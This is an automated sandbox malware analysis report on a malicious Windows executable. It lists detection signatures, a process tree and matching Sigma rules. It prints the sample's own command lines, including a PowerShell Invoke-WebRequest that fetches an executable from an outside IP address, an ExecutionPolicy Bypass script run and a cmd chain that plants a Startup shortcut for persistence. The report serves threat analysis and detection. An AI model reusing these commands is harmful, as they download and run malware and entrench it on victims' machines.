Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EO3RT0fEfb.exe

Overview

General Information

Sample name:EO3RT0fEfb.exe
renamed because original name is a hash value
Original sample name:c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429.exe
Analysis ID:1577214
MD5:dc83439d47b35f0556beedbc95c57fc5
SHA1:a3674a56c0e6d0ce15936177efc40c0fb0ffe660
SHA256:c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429
Tags:139-99-188-124exeuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • EO3RT0fEfb.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\EO3RT0fEfb.exe" MD5: DC83439D47B35F0556BEEDBC95C57FC5)
    • powershell.exe (PID: 7544 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7760 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Guard.exe (PID: 7920 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 7936 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7176 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 7276 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7920, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7760, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7920, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7936, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7760, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7176, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7544, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7760, ProcessName: powershell.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7176, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 7276, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7544, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7176, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7936, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: EO3RT0fEfb.exeReversingLabs: Detection: 55%
Source: EO3RT0fEfb.exeVirustotal: Detection: 45%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: EO3RT0fEfb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF75F1BC7C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BBC70
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BB7C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF75F1C72A8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C71F4 FindFirstFileW,FindClose,0_2_00007FF75F1C71F4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F182F50 FindFirstFileExW,0_2_00007FF75F182F50
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF75F1CA874
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF75F1C6428
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA4F8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA350
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B64005
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00B6494A
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6C2FF
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00B6CD9F
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD14 FindFirstFileW,FindClose,5_2_00B6CD14
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F5D8
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F735
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6FA36
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B63CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose,12_2_002B494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD14 FindFirstFileW,FindClose,12_2_002BCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_002BCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B3CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 08:32:32 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 06 Dec 2024 09:21:58 GMTETag: "da2a8-628968bf31962"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 